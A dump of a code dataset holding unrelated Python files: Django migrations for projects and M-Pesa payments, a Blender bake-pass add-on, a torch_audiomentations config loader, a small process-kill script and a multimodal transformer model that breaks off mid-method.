content stringlengths 5 1.05M |
|---|
# Generated by Django 3.0.7 on 2020-09-18 18:07
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated (Django 3.0.7): removes the 'link' field that was
    # added to Project in migration 0011.

    dependencies = [
        ('projects', '0011_project_link'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='project',
            name='link',
        ),
    ]
|
import bpy
from . import bake_manager
from . import string_manager
from enum import Enum
from bpy.props import (
IntProperty,
BoolProperty,
BoolVectorProperty,
EnumProperty,
FloatProperty,
FloatVectorProperty,
StringProperty,
PointerProperty
)
class BakeType(Enum):
    """Enumeration of all supported bake pass types.

    Member names match the identifiers used in BakePass.bake_type_items
    (except BASE_COLOR, which the property stores as "BASE COLOR").

    BUG FIX: the previous definition had a trailing comma after every
    value except POINTINESS, which made those member values 1-tuples
    like ``(0,)`` instead of plain ints. All values are now integers.
    """
    TRANSMISSION = 0
    GLOSSY = 1
    DIFFUSE = 2
    ENVIRONMENT = 3
    EMIT = 4
    ROUGHNESS = 5
    UV = 6
    NORMAL = 7
    SHADOW = 8
    AO = 9
    COMBINED = 10
    METALLIC = 11
    BASE_COLOR = 12
    DISPLACEMENT = 13
    ALPHA = 14
    CHANNEL_TRANSFER = 15
    AOV = 16
    POINTINESS = 17
def get_bake_type_string(bake_type, no_underscore=False):
    """Return the bake type as a display string ("BASE COLOR" etc.) for an
    integer bake type value.

    Custom attributes stored on the fly (``bake_pass['bake_type']``) only
    hold the integer value, not the enum identifier, hence this lookup.

    Underscores are always replaced by spaces; ``no_underscore`` is kept
    for backward compatibility but was never consulted by the original
    implementation, so it remains unused here.

    :param bake_type: integer index of the bake type (0-17)
    :param no_underscore: unused, kept for interface compatibility
    :return: human-readable bake type name with underscores as spaces
    """
    # TODO: Check if this function is still used
    bake_type_names = (
        "TRANSMISSION", "GLOSSY", "DIFFUSE", "ENVIRONMENT", "EMIT",
        "ROUGHNESS", "UV", "NORMAL", "SHADOW", "AO", "COMBINED",
        "METALLIC", "BASE_COLOR", "DISPLACEMENT", "ALPHA",
        "CHANNEL_TRANSFER", "AOV", "POINTINESS",
    )
    # str.replace with no count already replaces every occurrence; the
    # original's count of 1000 was an arbitrary "large enough" number.
    return bake_type_names[bake_type].replace("_", " ")
def on_bake_type_update(self, context):
    """
    Update callback for BakePass.bake_type.

    Renames the bake pass so its name tracks the newly selected bake
    type, preserving whichever casing style (CamelCase / underscore /
    UPPERCASE) the old type appeared in within the current name. The
    previously selected type is remembered in the custom attribute
    ``bake_pass['old_type']``.
    """
    from . import string_manager as sm
    # Resolve the owning bake pass from its RNA path relative to the scene.
    # NOTE(review): building a string and eval-ing it is fragile; Blender's
    # ``self.id_data.path_resolve(self.path_from_id())`` would avoid eval —
    # confirm before changing, as this callback runs on every enum change.
    scene_string = repr(self.id_data)
    bake_pass_string = repr(self.path_from_id())
    bake_pass_string = bake_pass_string.replace("'", "")
    bake_pass = eval(scene_string + "." + bake_pass_string)
    bake_type = bake_pass.bake_type
    # Seed 'old_type' if the custom attribute is missing (first update).
    old_type = bake_pass.get('old_type')
    if not old_type:
        bake_pass['old_type'] = bake_type
        old_type = ""
    # Rename if name is empty
    if bake_pass.name == "":
        print("renamed because name was empty")
        bake_pass.name = bake_type
        bake_pass['old_type'] = bake_type
        return
    print("\n old_type = " + old_type)
    old_name = ""
    new_name = ""
    print(bake_pass.name + ".find(" + sm.to_camelcase(old_type) + ") = " + str(bake_pass.name.find(sm.to_camelcase(old_type))))
    # No previous type recorded: just take the new type as the name.
    if old_type == "":
        bake_pass.name = bake_type
        bake_pass['old_type'] = bake_type
        return
    # Detect which casing style the old type appears in, and build the
    # matching replacement pair. If none matches, old_name/new_name stay
    # empty and the replace below is a no-op.
    # Camelcase
    if bake_pass.name.find(sm.to_camelcase(old_type)) > -1:
        print(old_type + " is camelcase")
        old_name = sm.to_camelcase(old_type)
        new_name = sm.to_camelcase(bake_type)
    # Underscore
    elif bake_pass.name.find(sm.to_underscore(old_type)) > -1:
        print(old_type + " is underscore")
        old_name = sm.to_underscore(old_type)
        new_name = sm.to_underscore(bake_type)
    # Uppercase
    elif bake_pass.name.find(old_type.upper()) > -1:
        print(old_type + " is uppercase")
        old_name = old_type.upper()
        new_name = bake_type.upper()
    print("working with " + bake_pass.name + ". Replaceing " + old_name + " with " + new_name)
    bake_pass.name = bake_pass.name.replace(old_name, new_name)
    bake_pass['old_type'] = bake_type
class BakePass(bpy.types.PropertyGroup):
    """A single bake pass: what to bake and all per-pass settings.

    Stored in ``bpy.types.Scene.bake_passes`` (see register()).
    """

    auto_description = "Trust Bystedts preferred settings depending on the bake type"
    global_description = "Use the setting in the global settings in the top of the UI"
    temporary_description = "Use a temporary scene. This usually saves time, since less objects needs to be loaded. Lights will not be transferred to the temporary scene"
    # ("GLOBAL_SETTINGS", "Global settings", global_description, 0),
    value_keyword_items = [
        ("AUTO", "Auto", auto_description, 0),
        ("SET", "Set", "", 1)
    ]
    name: bpy.props.StringProperty(name="Name", default="Unknown")
    ui_display: bpy.props.BoolProperty(name="UI display", default=False, description="Show or hide in UI")
    # Don't forget to possibly add new passes to is_non_default_bake_pass
    # NOTE(review): "BASE COLOR" uses a space while every other identifier
    # uses underscores. It is a stored identifier, so it is kept as-is for
    # backward compatibility with existing .blend files.
    bake_type_items = [
        ("TRANSMISSION", "Transmission", "", 0),
        ("GLOSSY", "Glossy", "", 1),
        ("DIFFUSE", "Diffuse", "", 2),
        ("ENVIRONMENT", "Environment", "", 3),
        ("EMIT", "Emit", "", 4),
        ("ROUGHNESS", "Roughness", "", 5),
        ("UV", "Uv", "", 6),
        ("NORMAL", "Normal", "", 7),
        ("SHADOW", "Shadow", "", 8),
        ("AO", "Ambient occlusion", "", 9),
        ("COMBINED", "Combined", "", 10),
        ("METALLIC", "Metallic", "", 11),
        ("BASE COLOR", "Base Color", "", 12),
        ("DISPLACEMENT", "Displacement", "", 13),
        ("ALPHA", "Alpha", "", 14),
        ("CHANNEL_TRANSFER", "Channel transfer", "", 15),
        ("AOV", "AOV", "", 16),
        ("POINTINESS", "Pointiness", "", 17),
        ("MATERIAL_ID", "Material ID", "", 18),
    ]
    bake_type: bpy.props.EnumProperty(
        name="Bake type",
        description="Bake type",
        items=bake_type_items,
        default="BASE COLOR",
        update=on_bake_type_update)
    sample_type: bpy.props.EnumProperty(
        name="Sample type",
        description="Samples type",
        default="AUTO",
        items=value_keyword_items)
    # I removed AUTO from bake space
    bake_locations_items = [
        ("AUTO", "Auto", "", 0),
        ("CURRENT_LOCATION", "Current location", "Use objects Current location during baking. Can result in wrong surface being hit", 1),
        ("EXPLODED", "Exploded", "Place objects far from each other during baking. Will avoid wrong surface being hit.", 2)
    ]
    bake_locations: bpy.props.EnumProperty(
        name="Bake space",
        description="Bake space",
        items=bake_locations_items)
    sub_pixel_sample_items = [
        ("AUTO", "Auto", auto_description, 0),
        ("1", "X 1", "", 1),
        ("2", "X 2", "", 2),
        ("4", "X 4", "", 3),
    ]
    # Note to self: I used to set sub pixel sample per bake pass
    # changed my mind and used an over all setting instead
    sub_pixel_sample: bpy.props.EnumProperty(name="Sub pixel sample", description="Higher sub pixel sample improves anti aliasing", items=sub_pixel_sample_items)
    bake_scene_items = [
        ("AUTO", "Auto", auto_description, 0),
        ("CURRENT", "Current scene", "Use current scene for baking", 1),
        ("TEMPORARY", "Temporary scene", temporary_description, 2),
    ]
    bake_scene: bpy.props.EnumProperty(
        name="Bake scene",
        description="Which scene to bake in",
        default="AUTO",
        items=bake_scene_items)
    samples: bpy.props.IntProperty(
        name="Samples",
        description="Amount of samples during baking",
        default=1,
        min=0,
        soft_max=256)
    # Normal ========================
    normal_space_items = [
        ("OBJECT", "Object", "", 0),
        ("TANGENT", "Tangent", "", 1)
    ]
    normal_space: bpy.props.EnumProperty(
        name="Space",
        description="Choose normal space for baking",
        items=normal_space_items,
        default="TANGENT")
    normal_map_type_items = [
        ("OPEN_GL", "Open GL", "", 0),
        ("DIRECT_X", "Direct X", "", 1)
    ]
    normal_map_type: bpy.props.EnumProperty(
        name="Normal map type",
        description="Type of normal map",
        items=normal_map_type_items,
        default="OPEN_GL")
    # BUG FIX: the NEG_* entries previously displayed "+ X", "+ Y", "+ Z"
    # (copy-paste error); they now display "- X", "- Y", "- Z".
    normal_map_swizzle_items = [
        ("POS_X", "+ X", "", 0),
        ("POS_Y", "+ Y", "", 1),
        ("POS_Z", "+ Z", "", 2),
        ("NEG_X", "- X", "", 3),
        ("NEG_Y", "- Y", "", 4),
        ("NEG_Z", "- Z", "", 5)
    ]
    normal_r: bpy.props.EnumProperty(
        name="Swizzle R",
        description="Type of normal map",
        items=normal_map_swizzle_items,
        default="POS_X")
    normal_g: bpy.props.EnumProperty(
        name="Swizzle G",
        description="Type of normal map",
        items=normal_map_swizzle_items,
        default="POS_Y")
    normal_b: bpy.props.EnumProperty(
        name="Swizzle B",
        description="Type of normal map",
        items=normal_map_swizzle_items,
        default="POS_Z")
    # Post process ========================
    post_process_items = [
        ("NO_POST_PROCESS", "No post process", "Don't perform post process", 0),
        ("AUTO", "Auto", "Trust Bystedts preferred settings", 1),
        ("DENOISE", "Denoise", "Use denoise", 2)
    ]
    post_process: bpy.props.EnumProperty(
        name="Post process",
        description="Which post process to perform on image after baking",
        default="AUTO",
        items=post_process_items)
    image_name_override: bpy.props.BoolProperty(
        name="Image name override",
        description="Always use the bake pass name when naming images and files",
    )
    # Channel transfer ========================
    # Names of source images for each channel of a CHANNEL_TRANSFER pass.
    R_source: bpy.props.StringProperty(
        name="R source",
        description="Which image to transfer red channel from",
    )
    G_source: bpy.props.StringProperty(
        name="G source",
        description="Which image to transfer green channel from",
    )
    B_source: bpy.props.StringProperty(
        name="B source",
        description="Which image to transfer blue channel from",
    )
    A_source: bpy.props.StringProperty(
        name="Alpha source",
        description="Which image to transfer alpha channel from",
    )
    channel_items = [
        ("R", "R", "Red channel", 0),
        ("G", "G", "Green channel", 1),
        ("B", "B", "Blue channel", 2),
        ("A", "A", "Alpha channel", 3),
        ("NONE", "None", "Don't transfer the channel", 4),
    ]
    transfer_source_channelR: bpy.props.EnumProperty(
        name="Target channel red",
        description="Channel to transfer red to",
        default="R",
        items=channel_items
    )
    transfer_source_channelG: bpy.props.EnumProperty(
        name="Target channel green",
        description="Channel to transfer green to",
        default="G",
        items=channel_items
    )
    transfer_source_channelB: bpy.props.EnumProperty(
        name="Target channel blue",
        description="Channel to transfer blue to",
        default="B",
        items=channel_items
    )
    transfer_source_channelA: bpy.props.EnumProperty(
        name="Target channel alpha",
        description="Channel to transfer alpha to",
        default="A",
        items=channel_items
    )
    # AOV ========================
    aov_name: bpy.props.StringProperty(
        name="AOV name",
        description="Name of the AOV in the shading network to bake",
        default="",
    )
    # NOTE(review): the trailing space in the "VALUE " identifier looks like
    # a typo, but it is a stored identifier — kept for backward compatibility
    # with scenes that already saved it.
    aov_data_type_items = [
        ("COLOR", "Color", "Bake aov color value", 0),
        ("VALUE ", "Value", "Bake aov value", 1),
    ]
    aov_data_type: bpy.props.EnumProperty(
        name="AOV data type",
        description="Bake AOV color or value",
        default="COLOR",
        items=aov_data_type_items
    )
    # Pointiness ========================
    pointiness_contrast: bpy.props.FloatProperty(
        name="Pointiness contrast",
        description="Amount of contrast to use on the pointiness",
        default=20,
    )
    preview_bake_texture: bpy.props.BoolProperty(
        name="Preview bake texture",
        default=False)
def is_non_default_bake_pass(bake_pass_type):
    """Return True if the given bake type string (any casing) is NOT one of
    Cycles' built-in bake passes and therefore needs custom handling.

    :param bake_pass_type: bake type identifier, e.g. "METALLIC"
    :return: bool
    """
    # Fixes: the original shadowed the builtin ``list`` and did an O(n)
    # list membership test; a set literal is idiomatic and O(1).
    non_default_types = {
        'METALLIC',
        'BASE COLOR',
        'DISPLACEMENT',
        'ALPHA',
        'AOV',
        'POINTINESS',
        'MATERIAL_ID',
    }
    return bake_pass_type.upper() in non_default_types
def is_low_sample_pass(bake_pass):
    """Return True if this bake pass type can be baked with few samples
    (i.e. it does not need many rays to converge).

    :param bake_pass: object with a ``bake_type`` string attribute
    :return: bool
    """
    # Fixes: the original shadowed the builtin ``list`` and did an O(n)
    # list membership test; a set literal is idiomatic and O(1).
    low_sample_types = {
        'GLOSSY', 'DIFFUSE', 'EMIT', 'ROUGHNESS', 'UV', 'NORMAL',
        'METALLIC', 'BASE COLOR', 'DISPLACEMENT', 'ALPHA',
        'AOV', 'POINTINESS', 'MATERIAL_ID',
    }
    return bake_pass.bake_type.upper() in low_sample_types
def is_temporary_scene_bake_pass(bake_pass):
    """Return True if this bake pass type may be baked in a temporary scene
    (fewer objects to load; see BakePass.temporary_description).

    :param bake_pass: object with a ``bake_type`` string attribute
    :return: bool
    """
    # Fixes: the original shadowed the builtin ``list`` and did an O(n)
    # list membership test; a set literal is idiomatic and O(1).
    temporary_scene_types = {
        'GLOSSY', 'DIFFUSE', 'EMIT', 'ROUGHNESS', 'UV', 'NORMAL',
        'METALLIC', 'BASE COLOR', 'DISPLACEMENT', 'AO', 'SHADOW',
        'ALPHA', 'AOV', 'POINTINESS', 'MATERIAL_ID',
    }
    return bake_pass.bake_type.upper() in temporary_scene_types
def add_bakepass(context, BakeType):
    """Append a new bake pass to the scene's bake pass collection."""
    # NOTE(review): the ``BakeType`` parameter shadows the module-level
    # BakeType enum and is never used, and the new pass is always named
    # "Base Color" regardless of the requested type — confirm intended
    # behavior with callers before changing.
    new_bake_pass = context.scene.bake_passes.add()
    new_bake_pass.name = "Base Color"
class RENDER_OT_delete_bake_pass(bpy.types.Operator):
    """Delete bake pass"""
    bl_idname = "render.delete_bake_pass"
    bl_label = "Delete bake pass"
    bl_description = "Delete bake pass"
    # Index into context.scene.bake_passes of the pass to remove.
    bake_pass_index: IntProperty(
        name="Index to delete",
        description="Index of the bake pass to delete",
        min=0,
    )
    def execute(self, context):
        # CollectionProperty.remove() silently ignores out-of-range indices.
        context.scene.bake_passes.remove(self.bake_pass_index)
        return {'FINISHED'}
class RENDER_OT_toggle_bake_pass_ui_display(bpy.types.Operator):
    """Toggle bakepass ui display"""
    bl_idname = "render.toggle_bake_pass_ui_display"
    bl_label = "Expand/collapse"
    bl_description = "Toggle bakepass ui display"
    # Index into context.scene.bake_passes of the pass to expand/collapse.
    bake_pass_index: IntProperty(
        name="Index to toggle ui display",
        description="Index of the bake pass to toggle ui display",
        min=0,
    )
    def execute(self, context):
        # Flip the expand/collapse flag on the targeted bake pass.
        bake_pass = context.scene.bake_passes[self.bake_pass_index]
        bake_pass.ui_display = not bake_pass.ui_display
        return {'FINISHED'}
def get_base_color(bake_type, alpha=0.0):
    """Return the RGBA fill color [r, g, b, alpha] used when creating the
    image for the given bake type.

    Neutral-normal blue for NORMAL/UV, white for AO, black for
    EMIT/AOV/ALPHA, mid grey for everything else.
    """
    rgb_by_type = {
        "NORMAL": [0.5, 0.5, 1.0],
        "UV": [0.5, 0.5, 1.0],
        "AO": [1.0, 1.0, 1.0],
        "EMIT": [0, 0, 0],
        "AOV": [0, 0, 0],
        "ALPHA": [0, 0, 0],
    }
    rgb = rgb_by_type.get(bake_type, [0.5, 0.5, 0.5])
    return rgb + [alpha]
def get_pass_from_string(bake_pass_string):
    """Return the BakeType member whose name matches the text after the
    last underscore in ``bake_pass_string``, or None if nothing matches.

    Raises ValueError (from rindex) when the string has no underscore,
    matching the original behavior.
    """
    suffix_start = bake_pass_string.rindex("_") + 1
    suffix = bake_pass_string[suffix_start:]
    return next(
        (member for member in BakeType if member.name == suffix),
        None,
    )
def get_sorted_bake_passes_list(context):
    """
    Return all bake passes in the scene, ordered by processing priority:
    every regular pass first (original order preserved), then all
    CHANNEL_TRANSFER passes, which must run after the images they read
    from have been baked.
    """
    all_passes = context.scene.bake_passes
    regular = [bp for bp in all_passes if bp.bake_type != 'CHANNEL_TRANSFER']
    transfers = [bp for bp in all_passes if bp.bake_type == 'CHANNEL_TRANSFER']
    return regular + transfers
# All classes this add-on module registers with Blender.
classes = (
    BakePass,
    RENDER_OT_delete_bake_pass,
    RENDER_OT_toggle_bake_pass_ui_display,
)


def register():
    """Register all classes and attach the bake pass collection to Scene."""
    for registered_class in classes:
        bpy.utils.register_class(registered_class)
    bpy.types.Scene.bake_passes = bpy.props.CollectionProperty(type=BakePass)


def unregister():
    """Unregister all classes and detach the bake pass collection."""
    for registered_class in classes:
        bpy.utils.unregister_class(registered_class)
    del bpy.types.Scene.bake_passes
from pathlib import Path
from typing import Any, Dict, Text, Optional, Union
from importlib import import_module
import torch_audiomentations
from torch_audiomentations import Compose
from torch_audiomentations.core.transforms_interface import BaseWaveformTransform
# TODO: define this elsewhere?
# TODO: update when a new type of transform is added (e.g. BaseSpectrogramTransform? OneOf? SomeOf?)
# https://github.com/asteroid-team/torch-audiomentations/issues/26
Transform = Union[BaseWaveformTransform, Compose]
def get_class_by_name(
    class_name: str, default_module_name: str = "torch_audiomentations"
) -> type:
    """Load class by its name.

    Parameters
    ----------
    class_name : `str`
        Either a fully qualified dotted path ("pkg.module.Class") or a bare
        class name resolved against `default_module_name`.
    default_module_name : `str`, optional
        Used when `class_name` does not contain the absolute path.
        Defaults to "torch_audiomentations".

    Returns
    -------
    Klass : `type`
        Class.

    Example
    -------
    >>> YourAugmentation = get_class_by_name('your_package.your_module.YourAugmentation')
    >>> YourAugmentation = get_class_by_name('YourAugmentation', default_module_name='your_package.your_module')
    >>> from torch_audiomentations import Gain
    >>> assert Gain == get_class_by_name('Gain')
    """
    tokens = class_name.split(".")
    if len(tokens) == 1:
        if default_module_name is None:
            # BUG FIX: the two f-string fragments previously concatenated
            # without a space ("...name".Please provide...").
            msg = (
                f'Could not infer module name from class name "{class_name}". '
                f"Please provide default module name."
            )
            raise ValueError(msg)
        module_name = default_module_name
    else:
        module_name = ".".join(tokens[:-1])
        class_name = tokens[-1]
    # AttributeError propagates if the module lacks the class; callers
    # (e.g. from_dict) rely on that.
    return getattr(import_module(module_name), class_name)
def from_dict(config: Dict[Text, Union[Text, Dict[Text, Any]]]) -> Transform:
    """Instantiate a transform from a configuration dictionary.

    `from_dict` can be used to instantiate a transform from its class name.
    For instance, these two pieces of code are equivalent:

    >>> from torch_audiomentations import Gain
    >>> transform = Gain(min_gain_in_db=-12.0)

    >>> transform = from_dict({'transform': 'Gain',
    ...                        'params': {'min_gain_in_db': -12.0}})

    Transforms composition is also supported: sub-transform configurations
    are recursively instantiated for 'Compose', 'OneOf' and 'SomeOf'.

    :param config: configuration - a configuration dictionary
    :returns: A transform.
    :rtype Transform:
    """
    if "transform" not in config:
        raise ValueError(
            "A (currently missing) 'transform' key should be used to define the transform type."
        )
    transform_name: Text = config["transform"]

    try:
        transform_class = get_class_by_name(transform_name)
    except AttributeError:
        raise ValueError(
            f"torch_audiomentations does not implement {transform_name} transform."
        )

    transform_params: Dict = config.get("params", dict())
    if not isinstance(transform_params, dict):
        raise ValueError(
            "Transform parameters must be provided as {'param_name': param_value} dictionary."
        )

    # Composite transforms carry a list of sub-configurations that must be
    # instantiated recursively before the composite itself is built.
    if transform_name in ("Compose", "OneOf", "SomeOf"):
        transform_params["transforms"] = [
            from_dict(sub_config) for sub_config in transform_params["transforms"]
        ]

    return transform_class(**transform_params)
def from_yaml(file_yml: Union[Path, Text]) -> Transform:
    """Instantiate a transform from a YAML configuration file.

    `from_yaml` can be used to instantiate a transform from a YAML file.
    For instance, these two pieces of code are equivalent:

    >>> from torch_audiomentations import Gain
    >>> transform = Gain(min_gain_in_db=-12.0, mode="per_channel")

    >>> transform = from_yaml("config.yml")

    where the content of `config.yml` is something like:

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    # config.yml
    transform: Gain
    params:
      min_gain_in_db: -12.0
      mode: per_channel
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Transforms composition is also supported:

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    # config.yml
    transform: Compose
    params:
      shuffle: True
      transforms:
        - transform: Gain
          params:
            min_gain_in_db: -12.0
            mode: per_channel
        - transform: PolarityInversion
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    :param file_yml: configuration file - a path to a YAML file with the above structure
    :returns: A transform.
    :rtype Transform:
    """
    try:
        import yaml
    except ImportError as e:
        # FIX: chain the original ImportError so the root cause is visible.
        raise ImportError(
            "PyYAML package is needed by `from_yaml`: please install it first."
        ) from e

    with open(file_yml, "r") as f:
        # SafeLoader: never execute arbitrary YAML tags from config files.
        config = yaml.load(f, Loader=yaml.SafeLoader)

    return from_dict(config)
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
=============
Cadc TAP plus
=============
"""
|
#!/usr/bin/python
import subprocess
import time
import os
import signal
PID = 10128
def check_pid(pid):
    """Check for the existence of a unix pid.

    Sends signal 0, which performs error checking only and does not
    actually deliver a signal.

    :param pid: process id to probe
    :return: True if a process with that pid exists, else False
    """
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        # No such process.
        return False
    except PermissionError:
        # BUG FIX: EPERM means the process EXISTS but belongs to another
        # user; the original lumped this into OSError and returned False.
        return True
    except OSError as ex:
        # Any other OS-level failure: report it and assume not running.
        template = "An exception of type {0} occured.\nArguments:\n{1!r}"
        message = template.format(type(ex).__name__, ex.args)
        print(message)
        return False
    else:
        return True
# Kill the existing running server process, then report whether it is
# still alive. NOTE(review): SIGTERM is asynchronous — the process may
# still be shutting down when check_pid runs immediately afterwards.
os.kill(int(PID), signal.SIGTERM)
if check_pid(PID) is True:
    print('Process is Still Running')
else:
    print('No Process With pid %s ' % (PID))
# Generated by Django 3.2.9 on 2021-11-15 09:27
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration (Django 3.2.9): creates the
    # MpesaCallbacks, MpesaCalls and MpesaPayments tables.

    initial = True

    dependencies = []

    operations = [
        migrations.CreateModel(
            name="MpesaCallbacks",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                ("updated_at", models.DateTimeField(auto_now=True)),
                ("ip_address", models.TextField()),
                ("caller", models.TextField()),
                ("conversation_id", models.TextField()),
                ("content", models.TextField()),
            ],
            options={
                "verbose_name": "Mpesa Callback",
                "verbose_name_plural": "Mpesa Callbacks",
                "db_table": "mpesa_callbacks",
            },
        ),
        migrations.CreateModel(
            name="MpesaCalls",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                ("updated_at", models.DateTimeField(auto_now=True)),
                ("ip_address", models.TextField()),
                ("caller", models.TextField()),
                ("conversation_id", models.TextField()),
                ("content", models.TextField()),
            ],
            options={
                "verbose_name": "Mpesa Call",
                "verbose_name_plural": "Mpesa Calls",
                "db_table": "mpesa_calls",
            },
        ),
        migrations.CreateModel(
            name="MpesaPayments",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                ("updated_at", models.DateTimeField(auto_now=True)),
                ("amount", models.DecimalField(decimal_places=2, max_digits=10)),
                ("description", models.TextField()),
                ("type", models.TextField()),
                ("reference", models.TextField()),
                ("first_name", models.CharField(max_length=100)),
                ("middle_name", models.CharField(max_length=100)),
                ("last_name", models.CharField(max_length=100)),
                ("phone_number", models.TextField()),
                (
                    "organization_balance",
                    models.DecimalField(decimal_places=2, max_digits=10),
                ),
            ],
            options={
                "verbose_name": "Mpesa Payment",
                "verbose_name_plural": "Mpesa Payments",
            },
        ),
    ]
|
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import framework.configbase
from framework.ops import l2norm
from modules.transformer_encoder import Encoder, VISEncoder, CrossEncoder
from modules.common import gelu
class TransformerConfig(framework.configbase.ModuleConfig):
    """Configuration holder for the multimodal Transformer below."""
    def __init__(self):
        super(TransformerConfig, self).__init__()
        self.vocab = 0               # vocabulary size (expected to be set by caller)
        self.attr_num = 2010         # output size of the 'attp' attribute head
        self.img_max = 10            # presumably max image regions — TODO confirm
        self.src_max = 36            # presumably max source length — TODO confirm
        self.tgt_max = 72            # max target length (used as decode limit in sample/beam_search)
        self.d_model = 512           # hidden / embedding dimension
        self.n_layers = 3            # cross-encoder depth
        self.vis_layers = 1          # visual encoder depth
        self.txt_layers = 1          # text encoder depth
        self.heads = 8               # attention heads
        self.dropout = 0.1
        self.encoder_sharing = False  # if True, src and trg share one text encoder
        self.decoding = 'greedy'      # decoding strategy name
class Transformer(nn.Module):
    """
    Multimodal transformer: separate image / source-text / target-text
    encoders fused by a cross encoder, with three heads: token logits
    (default), binary 'itm' classification, and 'attp' attribute
    prediction. Decoding uses hard-coded special token ids
    (init=2, eos=3, mask=4) — assumed to match the vocabulary; confirm.
    """
    def __init__(self, config):
        super(Transformer, self).__init__()
        self.config = config
        self.vis_encoder = VISEncoder(self.config.d_model, self.config.vis_layers, self.config.heads, self.config.dropout)
        self.src_encoder = Encoder(self.config.vocab, self.config.d_model, self.config.txt_layers, self.config.heads, self.config.dropout)
        # Keep positional-encoding mode consistent across encoders.
        self.src_encoder.pe.mode = self.vis_encoder.pe.mode
        if self.config.encoder_sharing:
            # Source and target sentences share one text encoder.
            self.trg_encoder = self.src_encoder
        else:
            self.trg_encoder = Encoder(self.config.vocab, self.config.d_model, self.config.txt_layers, self.config.heads, self.config.dropout)
            self.trg_encoder.pe.mode = self.src_encoder.pe.mode
        self.cross_encoder = CrossEncoder(self.config.d_model, self.config.n_layers, self.config.heads, self.config.dropout)
        # output layers
        self.logit = nn.Linear(self.config.d_model, self.config.vocab)
        # Weight tying: output projection shares the source embedding table.
        self.logit.weight = self.src_encoder.embed.embed.weight
        self.cls = nn.Linear(self.config.d_model, 2)                          # 'itm' head
        self.attr_cls = nn.Linear(self.config.d_model, self.config.attr_num)  # 'attp' head
        self.dropout = nn.Dropout(self.config.dropout)
        self.init_weights()

    def init_weights(self,):
        # Xavier init for every weight matrix; biases/1-d params untouched.
        for p in self.parameters():
            if p.dim() > 1:
                nn.init.xavier_uniform_(p)

    def forward(self, src, trg, img, src_mask, trg_mask, img_mask, task='mmt'):
        """Encode each modality, fuse with the cross encoder, and apply the
        head selected by ``task`` ('mmt' token logits, 'itm', or 'attp')."""
        # mode flags distinguish modalities inside the shared encoders.
        s_outputs = self.src_encoder(src, src_mask, mode=0)
        t_outputs = self.trg_encoder(trg, trg_mask, mode=1)
        i_outputs = self.vis_encoder(img, img_mask, mode=2)
        # Fused sequence order: [image | source | target].
        input = torch.cat([i_outputs, s_outputs, t_outputs], dim=1)
        if trg_mask is not None and trg_mask.size(1) != 1:
            # Build a block attention mask: image/source rows may attend to
            # image, source and the first target position; target rows use
            # the (causal) trg_mask for the target segment.
            firmask = torch.cat([img_mask, src_mask, trg_mask[:,0].unsqueeze(1)], dim=-1)
            firmask = firmask.repeat(1, img.size(1)+src.size(1), 1)
            img_mask = img_mask.repeat(1, trg.size(1), 1)
            src_mask = src_mask.repeat(1, trg.size(1), 1)
            secmask = torch.cat([img_mask, src_mask, trg_mask], dim=-1)
            mask = torch.cat([firmask, secmask], dim=1)
        else:
            mask = torch.cat([img_mask, src_mask, trg_mask], dim=-1)
        e_outputs = self.cross_encoder(input, mask)
        if task == 'itm':
            # Image-text matching: classify from the last fused position.
            output = self.cls(gelu(e_outputs[:,-1]))
        elif task == 'attp':
            # Attribute prediction from the last fused position.
            output = self.attr_cls(gelu(e_outputs[:,-1]))
        else:
            output = self.logit(e_outputs)
        return output

    def sample(self, src, img, src_mask, img_mask, decoding='greedy'):
        """Autoregressive decoding (greedy or multinomial sampling) up to
        config.tgt_max tokens, mask-predict style: a MASK token is appended
        and then overwritten by the predicted word each step."""
        init_tok, mask_tok = 2, 4  # assumed BOS=2, MASK=4 — TODO confirm
        bs = src.size(0)
        i_outputs = self.vis_encoder(img, img_mask, mode=2)
        s_outputs = self.src_encoder(src, src_mask, mode=0)
        init_word = torch.ones(bs, 1).fill_(init_tok).long().cuda()
        trg_mask = self.nopeak_mask(1).repeat(bs, 1, 1)
        t_outputs = self.trg_encoder(init_word, trg_mask, mode=1)
        input = torch.cat([i_outputs, s_outputs, t_outputs], dim=1)
        mask = torch.cat([img_mask, src_mask, trg_mask], dim=-1)
        # step=1 primes the cross encoder; later steps pass only target
        # states — presumably the cross encoder caches image/source context
        # via ``step`` — confirm against CrossEncoder.
        e_outputs = self.cross_encoder(input, mask, step=1)
        mask_word = torch.ones(bs, 1).fill_(mask_tok).long().cuda()
        outputs = torch.cat([init_word, mask_word], dim=1)
        for i in range(2, self.config.tgt_max):
            trg_mask = self.nopeak_mask(i).repeat(bs, 1, 1)
            t_outputs = self.trg_encoder(outputs, trg_mask, mode=1)
            out = self.logit(self.cross_encoder(t_outputs, trg_mask, step=i))
            logprobs = F.log_softmax(out[:,-1], dim=-1)
            if decoding == 'greedy':
                _, next_word = torch.max(logprobs, dim=1)
                next_word = next_word.unsqueeze(-1)
            else:
                # Multinomial sampling from the predicted distribution.
                probs = torch.exp(logprobs.data).cpu()
                next_word = torch.multinomial(probs, 1).cuda()
            # Replace the trailing MASK with the prediction, then append a
            # fresh MASK for the next step.
            outputs[:,-1] = next_word[:,0]
            outputs = torch.cat([outputs, mask_word], dim=1)
        return outputs

    def nopeak_mask(self, size):
        # Lower-triangular causal mask of shape (1, size, size); True where
        # attention is allowed.
